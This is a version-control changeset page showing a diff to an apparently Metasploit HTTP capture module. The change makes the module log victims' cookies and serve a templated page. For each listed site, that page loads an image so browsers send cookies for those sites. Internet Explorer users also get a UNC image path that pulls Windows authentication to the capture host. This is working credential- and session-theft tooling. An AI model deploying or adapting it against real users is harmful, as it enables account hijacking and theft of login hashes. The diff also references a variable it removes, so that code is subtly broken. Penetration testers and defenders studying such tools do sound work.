Changeset 5484
- Timestamp:
- 04/21/08 16:04:11 (3 weeks ago)
- Files:
-
- framework3/trunk/data/exploits/capture (added)
- framework3/trunk/data/exploits/capture/http (added)
- framework3/trunk/data/exploits/capture/http/index.html (added)
- framework3/trunk/data/exploits/capture/http/sites.txt (added)
- framework3/trunk/modules/auxiliary/server/capture/http.rb (modified) (5 diffs)
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/trunk/modules/auxiliary/server/capture/http.rb
r5483 r5484 45 45 [ 46 46 OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]), 47 OptPath.new('BGIMAGE', [ false, "The background image to use for the default web page", nil ]) 47 OptPath.new('TEMPLATE', [ false, "The HTML template to serve in responses", 48 File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "index.html") 49 ] 50 ), 51 OptPath.new('SITELIST', [ false, "The list of URLs that should be used for cookie capture", 52 File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "sites.txt") 53 ] 54 ) 48 55 ], self.class) 49 56 end … … 55 62 56 63 def run 57 @bgimage = datastore['BGIMAGE'] 58 @myhost = datastore['SRVHOST'] 59 @myport = datastore['SRVPORT'] 64 @template = datastore['TEMPLATE'] 65 @sitelist = datastore['SITELIST'] 66 @myhost = datastore['SRVHOST'] 67 @myport = datastore['SRVPORT'] 60 68 exploit() 61 69 end … … 141 149 mysrc = Rex::Socket.source_address(cli.peerhost) 142 150 hhead = (req['Host'] || @myhost).split(':', 2)[0] 151 152 153 cookies = req['Cookies'] || '' 154 143 155 144 156 if(req['Authorization'] and req['Authorization'] =~ /basic/i) … … 185 197 end 186 198 187 print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource} #{os_name} #{ua_name} #{ua_vers} ")199 print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource} #{os_name} #{ua_name} #{ua_vers} cookies=#{cookies}") 188 200 189 201 … … 205 217 # GET /bag.xml 206 218 end 207 208 209 # Background image 210 body_extra = "" 211 if(@bgimage) 212 img_ext = @bgimage.split(".")[-1].downcase 213 req_ext = req.resource.split(".")[-1] 214 ctypes = 215 { 216 "jpg" => "image/jpeg", 217 "jpeg" => "image/jpeg", 218 "png" => "image/png", 219 "gif" => "image/gif", 220 } 221 222 begin 223 if (img_ext == req_ext.downcase) 224 225 ctype = ctypes[img_ext] || ctypes["jpg"] 226 idata = "" 227 isize = File.size(@bgimage) 228 229 fd = File.open(@bgimage) 230 idata = fd.sysread(isize) 231 fd.close 232 233 res = 234 "HTTP/1.1 200 OK\r\n" + 235 "Host: #{mysrc}\r\n" + 236 "Content-Type: #{ctype}\r\n" + 237 "Content-Length: #{idata.length}\r\n" + 238 "Connection: Close\r\n\r\n#{idata}" 239 240 cli.put(res) 241 return 242 end 243 rescue ::Exception 244 end 245 246 body_extra = "<img src='/background.#{img_ext}' width='100%' height='100%'>" 247 end 248 249 250 data = "<html><head><title>Connecting...</title></head><body>#{body_extra}" 219 220 221 # Handle image requests 222 ctypes = 223 { 224 "jpg" => "image/jpeg", 225 "jpeg" => "image/jpeg", 226 "png" => "image/png", 227 "gif" => "image/gif", 228 } 229 230 req_ext = req.resource.split(".")[-1].downcase 231 232 if(ctypes[req_ext]) 233 ctype = ctypes[img_ext] || ctypes["jpg"] 234 res = 235 "HTTP/1.1 200 OK\r\n" + 236 "Host: #{mysrc}\r\n" + 237 "Content-Type: #{ctype}\r\n" + 238 "Content-Length: 0\r\n" + 239 "Connection: Close\r\n\r\n" 240 241 cli.put(res) 242 return 243 end 244 245 246 buff = '' 247 251 248 if(ua_name == "IE") 252 data << "<img src='\\\\#{mysrc}\\public#{Time.now.to_i.to_s}\\loading.jpg' width='1' height='1'>" 253 end 254 255 data << "</body></html>" 256 249 buff << "<img src='\\\\#{mysrc}\\public#{Time.now.to_i.to_s}\\loading.jpg' width='1' height='1'>" 250 end 251 252 list = File.readlines(@sitelist) 253 list.each do |site| 254 next if site =~ /^#/ 255 site.strip! 256 next if site.length == 0 257 buff << "<img src='http://#{site}/pixel.gif'>" 258 end 259 260 data = File.read(@template) 261 data.gsub!(/%CONTENT%/, buff) 262 257 263 res = 258 264 "HTTP/1.1 200 OK\r\n" +
